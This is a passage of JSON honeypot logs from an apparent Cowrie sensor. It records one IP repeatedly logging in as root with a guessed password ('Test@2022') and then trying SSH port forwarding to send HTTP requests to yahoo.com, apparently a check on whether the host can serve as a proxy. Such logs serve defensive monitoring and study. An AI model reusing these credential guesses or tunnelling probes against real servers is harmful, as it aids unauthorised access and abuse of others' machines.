-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:39.506401Z","src_ip":"213.209.150.239","session":"5a8852ec6262"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:39.789076Z","src_ip":"213.209.150.239","session":"5a8852ec6262"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":16636,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:16636","sensor":"my-vps","timestamp":"2025-08-26T00:58:39.846651Z","session":"5a8852ec6262"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:39.903388Z","src_ip":"213.209.150.239","session":"5a8852ec6262"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":8737,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:8737","sensor":"my-vps","timestamp":"2025-08-26T00:58:40.059146Z","session":"5a8852ec6262"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:40.115905Z","src_ip":"213.209.150.239","session":"5a8852ec6262"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:40.174024Z","src_ip":"213.209.150.239","session":"5a8852ec6262"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1118,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd0bc239182f","protocol":"ssh","message":"New connection: 213.209.150.239:1118 (1.2.3.4:22) [session: dd0bc239182f]","sensor":"my-vps","timestamp":"2025-08-26T00:58:40.219901Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:40.220689Z","src_ip":"213.209.150.239","session":"dd0bc239182f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:40.268006Z","src_ip":"213.209.150.239","session":"dd0bc239182f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:40.503136Z","src_ip":"213.209.150.239","session":"dd0bc239182f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":17286,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:17286","sensor":"my-vps","timestamp":"2025-08-26T00:58:40.551314Z","session":"dd0bc239182f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:40.598642Z","src_ip":"213.209.150.239","session":"dd0bc239182f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":5195,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:5195","sensor":"my-vps","timestamp":"2025-08-26T00:58:40.733550Z","session":"dd0bc239182f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:40.780723Z","src_ip":"213.209.150.239","session":"dd0bc239182f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:40.828558Z","src_ip":"213.209.150.239","session":"dd0bc239182f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1167,"dst_ip":"1.2.3.4","dst_port":22,"session":"da16517d87bc","protocol":"ssh","message":"New connection: 213.209.150.239:1167 (1.2.3.4:22) [session: da16517d87bc]","sensor":"my-vps","timestamp":"2025-08-26T00:58:40.884067Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:40.884751Z","src_ip":"213.209.150.239","session":"da16517d87bc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:40.941368Z","src_ip":"213.209.150.239","session":"da16517d87bc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:41.222650Z","src_ip":"213.209.150.239","session":"da16517d87bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":2514,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:2514","sensor":"my-vps","timestamp":"2025-08-26T00:58:41.281013Z","session":"da16517d87bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:41.337533Z","src_ip":"213.209.150.239","session":"da16517d87bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":23377,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:23377","sensor":"my-vps","timestamp":"2025-08-26T00:58:41.490878Z","session":"da16517d87bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:41.547359Z","src_ip":"213.209.150.239","session":"da16517d87bc"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:41.604995Z","src_ip":"213.209.150.239","session":"da16517d87bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38563,"dst_ip":"1.2.3.4","dst_port":23,"session":"c0c28b392dca","protocol":"telnet","message":"New connection: 212.227.235.229:38563 (1.2.3.4:23) [session: c0c28b392dca]","sensor":"my-vps","timestamp":"2025-08-26T00:58:41.636272Z"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1231,"dst_ip":"1.2.3.4","dst_port":22,"session":"249002f16e87","protocol":"ssh","message":"New connection: 213.209.150.239:1231 (1.2.3.4:22) [session: 249002f16e87]","sensor":"my-vps","timestamp":"2025-08-26T00:58:41.651335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:41.653051Z","src_ip":"213.209.150.239","session":"249002f16e87"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:41.700422Z","src_ip":"213.209.150.239","session":"249002f16e87"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:41.936281Z","src_ip":"213.209.150.239","session":"249002f16e87"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":26417,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:26417","sensor":"my-vps","timestamp":"2025-08-26T00:58:41.984892Z","session":"249002f16e87"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:42.032440Z","src_ip":"213.209.150.239","session":"249002f16e87"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":30763,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:30763","sensor":"my-vps","timestamp":"2025-08-26T00:58:42.169466Z","session":"249002f16e87"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:42.216797Z","src_ip":"213.209.150.239","session":"249002f16e87"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:42.264719Z","src_ip":"213.209.150.239","session":"249002f16e87"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1288,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c88eadcf7bc","protocol":"ssh","message":"New connection: 213.209.150.239:1288 (1.2.3.4:22) [session: 0c88eadcf7bc]","sensor":"my-vps","timestamp":"2025-08-26T00:58:42.310570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:42.311234Z","src_ip":"213.209.150.239","session":"0c88eadcf7bc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:42.358651Z","src_ip":"213.209.150.239","session":"0c88eadcf7bc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:42.593251Z","src_ip":"213.209.150.239","session":"0c88eadcf7bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":4224,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:4224","sensor":"my-vps","timestamp":"2025-08-26T00:58:42.641231Z","session":"0c88eadcf7bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:42.688792Z","src_ip":"213.209.150.239","session":"0c88eadcf7bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":21440,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:21440","sensor":"my-vps","timestamp":"2025-08-26T00:58:42.825459Z","session":"0c88eadcf7bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:42.873056Z","src_ip":"213.209.150.239","session":"0c88eadcf7bc"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:42.921377Z","src_ip":"213.209.150.239","session":"0c88eadcf7bc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1338,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a7bfb7da500","protocol":"ssh","message":"New connection: 213.209.150.239:1338 (1.2.3.4:22) [session: 1a7bfb7da500]","sensor":"my-vps","timestamp":"2025-08-26T00:58:42.977573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:42.979098Z","src_ip":"213.209.150.239","session":"1a7bfb7da500"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:43.035878Z","src_ip":"213.209.150.239","session":"1a7bfb7da500"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:43.318788Z","src_ip":"213.209.150.239","session":"1a7bfb7da500"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":11260,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:11260","sensor":"my-vps","timestamp":"2025-08-26T00:58:43.377148Z","session":"1a7bfb7da500"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:43.434106Z","src_ip":"213.209.150.239","session":"1a7bfb7da500"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":27993,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:27993","sensor":"my-vps","timestamp":"2025-08-26T00:58:43.591095Z","session":"1a7bfb7da500"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:43.647827Z","src_ip":"213.209.150.239","session":"1a7bfb7da500"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:43.705607Z","src_ip":"213.209.150.239","session":"1a7bfb7da500"}
